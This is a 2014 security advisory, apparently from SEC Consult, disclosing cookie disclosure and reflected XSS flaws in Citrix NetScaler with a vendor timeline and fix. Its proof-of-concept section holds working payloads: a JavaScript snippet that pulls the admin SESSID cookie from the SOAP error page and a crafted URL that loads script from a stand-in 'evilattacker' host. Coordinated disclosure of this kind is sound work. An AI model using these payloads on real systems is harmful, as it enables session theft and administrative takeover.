http://www.citrix.com/products/netscaler-application-delivery-controller/overview.html Business recommendation: - ------------------------ Attackers can exploit XSS and other vulnerabilities that lead to cookie disclosure to execute administrative actions. Affected Systems should be updated as soon as possible. Vulnerability overview/description: - ----------------------------------- 1) Cookie disclosure The error handler in the Apache g_soap module prints all of the request header information including the HTTP Cookie field. This vulnerability can be used in XSS attacks to gain access to the otherwise well protected (HttpOnly) "SESSID" cookie of an administrator. 2) Reflected Cross-Site Scripting (XSS) Citrix Netscaler suffers from multiple reflected Cross-Site Scripting vulnerabilities, which allow an attacker to steal user information, impersonate users and perform administrative actions on the appliance. There are many parameters which are not properly sanitized and thus vulnerable to XSS. Proof of concept: - ----------------- 1) Cookie disclosure A GET request to the SOAP handler returns the following information: GET /soap HTTP/1.1 Host: <host> *OTHER HEADER FIELDS* Response: HTTP/1.1 200 OK ... Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <HTML> ... <BODY> <H1>mod_gsoap Apache SOAP Server Error</H1> <p><strong>No body received</strong> ... <br>Cookie: SESSID=*SESSION ID*; ... In combination with an XSS vulnerability (see 2) an attacker can use the following code to extract cookies including the SESSID cookie of an administrator: var request = new XMLHttpRequest(); request.open('GET', '/soap', false); request.send(); lines=request.responseText.split('<br>') for (var i in lines){ if (lines[i].indexOf('Cookie')==0){ alert(lines[i]); break; } } 2) Reflected Cross-Site Scripting Accessing the following URL will include the Javascript code from http://evilattacker/evil.js: http://<host>/menu/topn?name=";<%2fscript><script+src%3d"http:%2f%2fevilattacker%2fevil.js"><%2fscript> Other pages do not sanitize user input properly as well: http://<host>/pcidss/launch_report?type=AA";alert('xss');x=" http://<host>/menu/guiw?nsbrand=AA<"'>AA&protocol=BB<"'>BB&id=CC<"'>CC Note: Content-Type is application/x-java-jnlp-file, so the injected script code is not interpreted. However, it is possible to inject arguments into a Java JNLP file, which might be used in further attacks. Vulnerable / tested versions: - ----------------------------- The vulnerabilities have been verified to exist in Citrix NetScaler VPX 10.0, which was the most recent version at the time of discovery. According to the vendor versions before 10.1-126.12 and 9.3-62.4 are vulnerable Vendor contact timeline: - ------------------------ 2014-01-09: Sending advisory and proof of concept exploit via encrypted channel. 2014-01-17: Vendor acknowledges receipt of advisory. 2014-04-04: Requesting status update. 2014-06-10: Vendor is "in the process of scheduling the release of a security bulletin". 2014-07-07: Requesting list of affected/non-affected versions CVE-IDs. 2014-07-07: Vendors is "still in the final stages of releasing the bulletin". 2014-07-07: Requesting info about cause of delay. 2014-07-07: Vendor is "still hopeful that the bulletin will be available soon". 2014-07-14: Vendor states that fixed version will be available on July 15/16. 2014-07-16: SEC Consult releases coordinated security advisory. Solution: - --------- Update to a more recent version of Citrix NetScaler. More information can be found at: https://support.citrix.com/article/ctx140863 Workaround: - ----------- No workaround available. Advisory URL: - ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult Interested in working with the experts of SEC Consult? Write to career@sec-consult.com EOF Stefan Viehb\xf6ck / @2014 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQEcBAEBAgAGBQJTxmWgAAoJECyFJyAEdlkKWLYH/0wpELCJemzmkj2HaotFZJtt 4C4/hsHWGbxmi2VbeiwGvYKHtDsw2KBDWlTrVTef3UrBnbAv6jFncTCjOv3eU6Ze 9swUmwxzNB9zqGvhYwEpcO8tSQu0H3xDMvbpKqYvq2qaBSm4YmJyUrDlwwSkCUnq ycGqzfidkAXoMUu/6wdam5251zXcR33n1KRfr3AH65p/OoOXrvasgY395Cty9zqW yfBvEIEs845aE/gbjbp40qvroz1dG8Z2LP4ykFWywVme0imgSD6nv/33Z0tDmlcD f7JjK8F7R7Q8l4J54n0iclXCWZhoS3pfabd60NXMzMmxroMuksmiNycm7yLGfe4= =KicK -----END PGP SIGNATURE-----